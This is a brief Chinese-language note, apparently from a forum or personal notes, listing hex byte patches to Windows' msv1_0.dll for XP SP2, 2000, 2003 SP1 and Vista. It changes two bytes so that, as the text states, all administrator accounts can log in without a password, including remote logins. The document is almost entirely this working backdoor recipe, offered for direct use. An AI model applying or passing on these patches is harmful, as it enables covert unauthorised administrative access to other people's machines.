system32下 有个msv1_0.dll
xp sp2
F8 10 75 11 B0 01 8B 4D
修改为
E0 00 75 11 B0 01 8B 4D
2k professinal
F8 10 0F 84 71 FF FF
修改为
E0 00 0F 84 71 FF FF
2k sp4
F8 10 75 11 b0 01 8b 4D
修改为
E0 00 75 11 b0 01 8b 4D
2003 sp1
F8 10 0F 84 D0 B8 FF FF
修改为
E0 00 0F 84 D0 B8 FF FF
vista rtm
F8 10 75 13 B0 01 8B 4D
修改为
E0 00 75 13 B0 01 8B 4D
都是前两个字节改为
E0 00
全部管理员帐号无须密码登陆
包括远程登陆的
改两个目录的 msv1_0.dll 用16进制
dir /s c:windowsmsv1_0.dll